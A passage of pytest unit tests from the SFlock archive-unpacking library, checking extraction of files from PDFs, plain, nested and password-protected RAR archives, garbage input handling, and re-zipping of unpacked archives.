16 | def test_pdf_embedded():
17 |     assert f("pdf_docm.pdf").magic.startswith("PDF document")
18 |     m = PdfFile(f("pdf_docm.pdf"))
19 |     assert m.handles() is True
20 |     assert m.f.selected
21 |     files = list(m.unpack())
22 |     assert m.f.extension == "pdf"
23 | 
24 |     assert len(files) == 1
25 |     assert not files[0].filepath
26 |     assert files[0].filename == "Q6TCWXPS.docm"
27 |     assert files[0].filesize == 55494
28 |     assert files[0].extension == "docm"
29 |     assert files[0].selected
30 |     assert len(files[0].children) == 18
31 | 
32 | def test_pdf_magic():
33 |     m = PdfFile(File(contents=f("pdf_docm.pdf").contents))
34 |     assert m.handles() is True
35 | 
36 | def test_pdf_is_embedded():
37 |     buf = io.BytesIO()
38 |     z = zipfile.ZipFile(buf, "w")
39 |     z.write("tests/files/pdf_docm.pdf")
40 |     z.close()
41 |     m = ZipFile(File(contents=buf.getvalue()))
42 |     files = list(m.unpack())
43 |     assert len(files) == 1
44 |     assert files[0].extension == "pdf"
45 |     assert len(files[0].children) == 1
46 |     assert files[0].children[0].extension == "docm"
47 | 
48 | def test_bypass_minimized():
49 |     m = PdfFile(f("bypass_minimized.pdf"))
50 |     files = list(m.unpack())
51 |     assert len(files) == 1
52 |     assert files[0].filename == "test.txt"
53 |     # TODO Fix actually reading the contents of this file correctly (which is
54 |     # a peepdf issue, AFAICT).
55 | 
56 | def test_garbage():
57 |     m = PdfFile(f("garbage.bin"))
58 |     assert m.handles() is False
59 |     assert not m.f.selected
60 |     assert not m.unpack()
61 | 


--------------------------------------------------------------------------------
/tests/test_rar.py:
--------------------------------------------------------------------------------
  1 | # Copyright (C) 2015-2018 Jurriaan Bremer.
  2 | # Copyright (C) 2018 Hatching B.V.
  3 | # This file is part of SFlock - http://www.sflock.org/.
  4 | # See the file 'docs/LICENSE.txt' for copying permission.
  5 | 
  6 | import os.path
  7 | import pytest
  8 | 
  9 | from sflock.abstracts import File
 10 | from sflock.errors import Errors
 11 | from sflock.exception import UnpackException, DecryptionFailedError
 12 | from sflock.main import unpack
 13 | from sflock.unpack import RarFile
 14 | 
 15 | 
 16 | def f(filename):
 17 |     return File.from_path(os.path.join("tests", "files", filename))
 18 | 
 19 | @pytest.mark.skipif("not RarFile(None).supported()")
 20 | class TestRarFile:
 21 |     def test_plain(self):
 22 |         assert "RAR archive" in f("rar_plain.rar").magic
 23 |         t = RarFile(f("rar_plain.rar"))
 24 |         assert t.handles() is True
 25 |         assert not t.f.selected
 26 |         files = list(t.unpack())
 27 |         assert len(files) == 1
 28 |         assert not files[0].filepath
 29 |         assert files[0].relapath == "bar.txt"
 30 |         assert files[0].contents == b"hello world\n"
 31 |         assert files[0].magic == "ASCII text"
 32 |         assert files[0].parentdirs == []
 33 |         assert not files[0].selected
 34 | 
 35 |     def test_nested_plain(self):
 36 |         assert "RAR archive" in f("rar_nested.rar").magic
 37 |         t = RarFile(f("rar_nested.rar"))
 38 |         assert t.handles() is True
 39 |         assert not t.f.selected
 40 |         files = list(t.unpack())
 41 |         assert len(files) == 1
 42 | 
 43 |         assert files[0].relapath == "foo/bar.txt"
 44 |         assert files[0].parentdirs == ["foo"]
 45 |         assert files[0].contents == b"hello world\n"
 46 |         assert not files[0].password
 47 |         assert files[0].magic == "ASCII text"
 48 |         assert not files[0].selected
 49 | 
 50 |     def test_nested2_plain(self):
 51 |         assert "RAR archive" in f("rar_nested2.rar").magic
 52 |         t = RarFile(f("rar_nested2.rar"))
 53 |         assert t.handles() is True
 54 |         assert not t.f.selected
 55 |         files = list(t.unpack())
 56 |         assert len(files) == 1
 57 | 
 58 |         assert files[0].relapath == "deepfoo/foo/bar.txt"
 59 |         assert files[0].parentdirs == ["deepfoo", "foo"]
 60 |         assert files[0].contents == b"hello world\n"
 61 |         assert not files[0].password
 62 |         assert files[0].magic == "ASCII text"
 63 |         assert not files[0].selected
 64 | 
 65 |     def test_rar_encrypted(self):
 66 |         assert "RAR archive" in f("sflock_encrypted.rar").magic
 67 |         z = RarFile(f("sflock_encrypted.rar"))
 68 |         assert z.handles() is True
 69 |         assert not z.f.selected
 70 |         files = list(z.unpack())
 71 |         assert len(files) == 1
 72 |         assert files[0].relapath == "sflock.txt"
 73 |         assert files[0].contents == b"sflock_encrypted_rar"
 74 |         assert "ASCII text" in files[0].magic
 75 |         assert files[0].parentdirs == []
 76 |         assert not files[0].selected
 77 | 
 78 |     def test_rar_decryption_fail(self):
 79 |         z = RarFile(f("sflock_encrypted2.rar"))
 80 |         assert z.handles() is True
 81 |         assert not z.f.selected
 82 | 
 83 |         with pytest.raises(DecryptionFailedError) as e:
 84 |             z.unpack()
 85 | 
 86 |     def test_heuristics(self):
 87 |         t = unpack("tests/files/rar_plain.rar", filename="foo")
 88 |         assert t.unpacker == "rarfile"
 89 |         assert t.filename == "foo"
 90 | 
 91 |         t = unpack("tests/files/rar_nested.rar", filename="foo")
 92 |         assert t.unpacker == "rarfile"
 93 |         assert t.filename == "foo"
 94 | 
 95 |         t = unpack("tests/files/rar_nested2.rar", filename="foo")
 96 |         assert t.unpacker == "rarfile"
 97 |         assert t.filename == "foo"
 98 | 
 99 |         t = unpack(
100 |             "tests/files/sflock_encrypted.rar",
101 |             filename="foo",
102 |             password="infected"
103 |         )
104 |         assert t.unpacker == "rarfile"
105 |         assert t.filename == "foo"
106 | 
107 |     # Does not produce this error
108 |     @pytest.mark.skip()
109 |     def test_symlink(self):
110 |         t = unpack("tests/files/symlink.rar")
111 |         assert t.unpacker == "rarfile"
112 |         assert t.mode == Errors.CANCELLED_SYMLINK
113 | 
114 |     def test_inmemory(self):
115 |         contents = open("tests/files/rar_plain.rar", "rb").read()
116 |         t = unpack(contents=contents)
117 |         assert t.unpacker == "rarfile"
118 |         assert t.filename is None
119 |         assert t.filepath is None
120 |         assert len(t.children) == 1
121 | 
122 |     def test_garbage(self):
123 |         t = RarFile(f("garbage.bin"))
124 |         assert t.handles() is False
125 |         assert not t.f.selected
126 |         with pytest.raises(UnpackException) as e:
127 |             t.unpack()
128 | 
129 |         assert e.value.state == Errors.NOTHING_EXTRACTED
130 | 
131 |     def test_garbage2(self):
132 |         t = RarFile(f("rar_garbage.rar"))
133 |         assert t.handles() is True
134 |         assert not t.f.selected
135 |         files = t.unpack()
136 | 
137 |         # The child file is garbage data. It should not be attempted
138 |         # to unpack.
139 |         assert len(files) == 1
140 |         assert not files[0].children
141 |         assert files[0].mode is None
142 | 
143 | @pytest.mark.skipif("RarFile(None).supported()")
144 | def test_norar_plain():
145 |     assert "RAR archive" in f(b"rar_plain.rar").magic
146 |     t = RarFile(f(b"rar_plain.rar"))
147 |     assert t.handles() is True
148 |     assert not t.f.selected
149 | 


--------------------------------------------------------------------------------
/tests/test_zipify.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import pytest
 6 | 
 7 | from sflock.abstracts import File
 8 | from sflock.main import unpack, zipify
 9 | from sflock.unpack import Zip7File
10 | 
11 | def test_zipify1():
12 |     a = unpack("tests/files/tar_plain.tar")
13 |     b = unpack(File(contents=zipify(a)).temp_path())
14 |     assert len(a.children) == len(b.children)
15 |     assert a.children[0].relapath == b.children[0].relapath
16 |     assert a.children[0].contents == b.children[0].contents
17 | 
18 | def test_zipify2():
19 |     a = unpack("tests/files/zip_nested.zip")
20 |     b = unpack(File(contents=zipify(a)).temp_path())
21 |     assert len(a.children) == len(b.children)
22 |     assert a.children[0].relapath == b.children[0].relapath
23 |     assert a.children[0].contents == b.children[0].contents
24 | 
25 | @pytest.mark.skipif("not Zip7File(None).supported()")
26 | def test_zipify3():
27 |     a = unpack("tests/files/7z_nested2.7z")
28 |     b = unpack(File(contents=zipify(a)).temp_path())
29 |     assert len(a.children) == len(b.children)
30 |     assert a.children[0].relapath == b.children[0].relapath
31 |     assert a.children[0].contents == b.children[0].contents
32 | 
33 | def test_zipify4():
34 |     a = unpack("tests/files/tar_plain2.tar")
35 |     b = unpack(File(contents=zipify(a)).temp_path())
36 |     assert len(a.children) == len(b.children)
37 |     assert a.children[0].relapath == b.children[0].relapath
38 |     assert a.children[0].contents == b.children[0].contents
39 |     assert a.children[1].relapath == b.children[1].relapath
40 |     assert a.children[1].contents == b.children[1].contents
41 | 


--------------------------------------------------------------------------------